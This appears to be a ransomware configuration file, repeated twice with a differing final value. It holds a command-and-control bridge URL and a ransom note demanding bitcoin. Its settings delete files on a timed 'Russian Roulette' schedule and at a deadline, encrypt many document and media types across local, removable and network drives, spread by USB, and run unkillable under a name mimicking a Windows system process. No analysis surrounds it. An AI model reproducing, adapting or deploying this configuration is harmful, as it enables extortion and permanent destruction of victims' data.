[file] mutex=de33058b156b20dee20f67f62b7669ca uac=not [bridges] 1=http://foolonthehill.website/dv/aldey/bridge-aldey.php [message] 115be2b98435259cbbcaa793c9b9dffc=All your files have been encrypted!\r\n\r\nAll your documents (databases, texts, images, videos, musics etc.) were encrypted. The encryption was done using a secret key \r\nthat is now on our servers.\r\n\r\nTo decrypt your files you will need to buy the secret key from us. We are the only on the world who can provide this for you.\r\n\r\nWhat can I do?\r\n\r\nPay the ransom, in bitcoins, in the amount and wallet below. You can use LocalBitcoins.com to buy bitcoins. [strings] 02061592f063b9b4e08f2adb3f8535c0=Deadline 50290a893d63a7afe77bef084ffb2a1b=Russian Roulette fb31ddd9c54fd3dd5a07c813678a3f62=Last file Deleted: d8aea318c44105aac275125140e7b085=Bitcoin Amount becb5f809420f184d8bc5b17f356a725=Wallet for Sending Bitcoins 0335a3a7ca4ecc2e1ba974a827efe31a=Copy 1084cf36076b23783289bf73bde2e0b5=Decrypt your Files 8802e8fce5bb3427e0705653fcffce77=Paste here the transaction ID to get your files back: 6fa726501ada6cb7cba8280032a303de=Click to Check aef87c1b6f665ebea931b4dd7322ba07=Speech (blank for none) [russian] enable=1 amount=2 interval=7 unit=h [deadline] enable=1 delfiles=1 delkey=1 interval=4 unit=D [ping] interval=60 [color] bg=0x11EE2D fg=0x000000 [random] sethidden=t melt=t gentxt=1 [folders] <fixed drives>=1 <removable drives>=1 <network drives>=1 <drive root folders>=1 Desktop=2 My Documents=2 Favorites=1 Home Path=2 Home Drive=0 Downloads=2 Pictures=2 Music=2 Videos=2 Desktop Common=2 Documents Common=2 [settings] extensions=*.7z;*.avi;*.bmp;*.cdr;*.dmg;*.doc;*.docx;*.gif;*.html;*.jpeg;*.jpg;*.mov;*.mp3;*.mp4;*.pdf;*.png;*.ppt;*.pptx;*.rar;*.rtf;*.tiff;*.txt;*.wallet;*.wma;*.wmv;*.xls;*.xlsx;*.zip usbinfect=1 unkillable=1 process=Isass.exe extractto=%appdata% showb4=1 [temp] p=mNMgpIpJkjHARAjA_iuC]kPn^ya^vemdQDY^WG

[file] mutex=de33058b156b20dee20f67f62b7669ca uac=not [bridges] 1=http://foolonthehill.website/dv/aldey/bridge-aldey.php [message] 115be2b98435259cbbcaa793c9b9dffc=All your files have been encrypted!\r\n\r\nAll your documents (databases, texts, images, videos, musics etc.) were encrypted. The encryption was done using a secret key \r\nthat is now on our servers.\r\n\r\nTo decrypt your files you will need to buy the secret key from us. We are the only on the world who can provide this for you.\r\n\r\nWhat can I do?\r\n\r\nPay the ransom, in bitcoins, in the amount and wallet below. You can use LocalBitcoins.com to buy bitcoins. [strings] 02061592f063b9b4e08f2adb3f8535c0=Deadline 50290a893d63a7afe77bef084ffb2a1b=Russian Roulette fb31ddd9c54fd3dd5a07c813678a3f62=Last file Deleted: d8aea318c44105aac275125140e7b085=Bitcoin Amount becb5f809420f184d8bc5b17f356a725=Wallet for Sending Bitcoins 0335a3a7ca4ecc2e1ba974a827efe31a=Copy 1084cf36076b23783289bf73bde2e0b5=Decrypt your Files 8802e8fce5bb3427e0705653fcffce77=Paste here the transaction ID to get your files back: 6fa726501ada6cb7cba8280032a303de=Click to Check aef87c1b6f665ebea931b4dd7322ba07=Speech (blank for none) [russian] enable=1 amount=2 interval=7 unit=h [deadline] enable=1 delfiles=1 delkey=1 interval=4 unit=D [ping] interval=60 [color] bg=0x11EE2D fg=0x000000 [random] sethidden=t melt=t gentxt=1 [folders] <fixed drives>=1 <removable drives>=1 <network drives>=1 <drive root folders>=1 Desktop=2 My Documents=2 Favorites=1 Home Path=2 Home Drive=0 Downloads=2 Pictures=2 Music=2 Videos=2 Desktop Common=2 Documents Common=2 [settings] extensions=*.7z;*.avi;*.bmp;*.cdr;*.dmg;*.doc;*.docx;*.gif;*.html;*.jpeg;*.jpg;*.mov;*.mp3;*.mp4;*.pdf;*.png;*.ppt;*.pptx;*.rar;*.rtf;*.tiff;*.txt;*.wallet;*.wma;*.wmv;*.xls;*.xlsx;*.zip usbinfect=1 unkillable=1 process=Isass.exe extractto=%appdata% showb4=1 [temp] p=BVG]MAZkECbWkSjCkalGguAyFbfhOtFkq]RDRt